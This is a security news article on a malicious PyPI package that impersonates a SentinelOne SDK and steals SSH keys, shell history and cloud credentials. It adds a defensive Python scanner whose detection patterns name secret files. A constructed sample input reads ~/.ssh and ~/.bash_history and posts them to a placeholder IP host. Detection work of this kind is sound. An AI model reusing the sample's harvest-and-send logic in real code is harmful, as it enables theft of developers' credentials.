Security researchers at ReversingLabs have discovered a malicious Python package on PyPI (the Python Package Index) that poses as a legitimate SDK client from cybersecurity firm SentinelOne but contains a backdoor and data exfiltration functionality.
According to ReversingLabs, which calls this campaign “SentinelSneak,” the imposter package was first uploaded to PyPI on December 11, 2022, and has been updated 20 times since, with the most recent version (1.2.1) uploaded on December 13.
While the module appears to be a fully functional SentinelOne client, it has no connection to the legitimate threat detection company. Apparently, the package developer tried to capitalize on a recognized brand to trick unsuspecting users.
While examining the SentinelOne PyPI package, the researchers noticed that the project page has a very rudimentary look with no description of the SentinelOne package and a maintainer account that was created only days before the initial package was uploaded, which they found to be suspicious.
“Especially interesting was the combination of the detected behaviors which includes enumeration of files in a given directory, deleting of a file/directory and creation of a new process. When such behaviors are combined with the presence of a URL which references the host by IP address, you can mark that module as suspicious. Referencing the host by an official domain would be expected from a commercial product,” ReversingLabs explained.
Digging further, the researchers discovered malicious code in the package’s “api.py” files designed to collect shell command execution history as well as the contents of the .ssh folder (SSH keys and configuration) and access credentials and secrets for Git, Kubernetes and AWS services.
“The code likewise performs a directory listing of the root directory. The collected data is then exfiltrated to the command and control (C2) server. Though clearly malicious, the counterfeit SentinelOne package is selective: taking only what is needed, and focusing on the subset of services that are found on machines used for software development,” the researchers noted.
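The behaviour combination ReversingLabs describes (file enumeration, file deletion and process creation together with a URL that names its host by IP address) can be turned into a simple static triage check over a package's Python source. The following is an added example written for this article, not ReversingLabs' or SentinelOne's tooling; the specific function names, sensitive paths and the constructed sample input are this example's assumptions.

```python
import ast
import re
# Behaviour groups modelled on the combination ReversingLabs flagged; the
# concrete function names below are this example's assumption, not the report's list.
BEHAVIOURS = {
    "enumerate_files": {("os", "listdir"), ("os", "walk"), ("os", "scandir")},
    "delete_file": {("os", "remove"), ("os", "unlink"), ("os", "rmdir"), ("shutil", "rmtree")},
    "spawn_process": {("subprocess", "Popen"), ("subprocess", "run"), ("subprocess", "check_output"), ("os", "system")},
}
# Developer-machine secrets the article says the package collected.
SENSITIVE_PATHS = (".ssh", ".bash_history", ".zsh_history", ".kube", ".aws", ".gitconfig")
IP_URL = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?(?:/|$)")  # host is a bare IPv4 literal

def _call_target(func):
    """Return (module, attr) for a call like os.listdir(...), else None."""
    if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
        return (func.value.id, func.attr)
    return None

def scan_source(src):
    """Statically collect behaviour hits, IP-literal URLs and sensitive paths from Python source."""
    hits = {group: set() for group in BEHAVIOURS}
    ip_urls, paths = set(), set()
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Call):
            target = _call_target(node.func)
            for group, names in BEHAVIOURS.items():
                if target in names:
                    hits[group].add(".".join(target))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if IP_URL.match(node.value):
                ip_urls.add(node.value)
            paths.update(p for p in SENSITIVE_PATHS if p in node.value)
    return {"behaviours": {g: sorted(h) for g, h in hits.items()},
            "ip_urls": sorted(ip_urls), "sensitive_paths": sorted(paths)}

def is_suspicious(findings):
    """Apply the report's rule: all three behaviours together plus a host referenced by IP."""
    return all(findings["behaviours"][g] for g in BEHAVIOURS) and bool(findings["ip_urls"])

# Constructed sample input mirroring the described pattern (not the real package's code).
SAMPLE = '''import os, subprocess, requests
def collect():
    keys = os.listdir(os.path.expanduser("~/.ssh"))
    hist = open(os.path.expanduser("~/.bash_history")).read()
    root = subprocess.check_output(["ls", "/"])
    requests.post("http://192.0.2.10:8080/upload", data={"k": keys, "h": hist, "r": root})
    os.remove("/tmp/stage")
'''
```

Run `scan_source` over each module of an unpacked wheel or sdist before installing it; a hit on `is_suspicious` is a reason to read the code, not proof of malice, since legitimate tooling can combine these calls too.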
ReversingLabs said it informed the PyPI security team about the malicious package on December 15, 2022, and SentinelOne was notified on December 16, 2022.